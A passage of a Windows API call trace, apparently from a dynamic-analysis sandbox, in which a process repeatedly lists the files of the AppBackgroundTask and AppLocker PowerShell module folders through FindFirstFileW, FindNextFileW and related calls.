FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0182.418] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0182.455] FindClose (in: hFindFile=0x1a9b69c0 | out: hFindFile=0x1a9b69c0) returned 1 [0182.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddc10) returned 1 [0182.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddbd0) returned 1 [0182.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0182.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0182.456] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6540 [0182.457] FindNextFileW (in: hFindFile=0x1a9b6540, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.457] FindNextFileW (in: hFindFile=0x1a9b6540, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0182.457] FindNextFileW (in: hFindFile=0x1a9b6540, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0182.458] FindNextFileW (in: hFindFile=0x1a9b6540, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0182.458] FindNextFileW (in: hFindFile=0x1a9b6540, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0182.458] FindNextFileW (in: hFindFile=0x1a9b6540, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0182.459] FindClose (in: hFindFile=0x1a9b6540 | out: hFindFile=0x1a9b6540) returned 1 [0182.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0182.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0182.459] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b67e0 [0182.460] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.460] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0182.460] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0182.461] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0182.461] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0182.461] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.461] FindClose (in: hFindFile=0x1a9b67e0 | out: hFindFile=0x1a9b67e0) returned 1 [0182.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7dd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0182.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb60) returned 1 [0182.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc40 | out: lpFileInformation=0x1b7ddc40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb20) returned 1 [0182.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb90) returned 1 [0182.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0182.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0182.462] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7dd830 | out: lpFindFileData=0x1b7dd830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6780 [0182.463] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.463] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0182.463] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0182.465] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0182.466] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0182.466] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0182.466] FindClose (in: hFindFile=0x1a9b6780 | out: hFindFile=0x1a9b6780) returned 1 [0182.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddae0) returned 1 [0182.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaa0) returned 1 [0182.467] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0182.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0182.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0182.467] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b67e0 [0182.468] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.468] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0182.469] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0182.469] FindClose (in: hFindFile=0x1a9b67e0 | out: hFindFile=0x1a9b67e0) returned 1 [0182.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0182.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0182.469] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.470] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.470] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0182.470] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.470] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7dd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0182.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb60) returned 1 [0182.471] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc40 | out: lpFileInformation=0x1b7ddc40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb20) returned 1 [0182.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb90) returned 1 [0182.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0182.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", 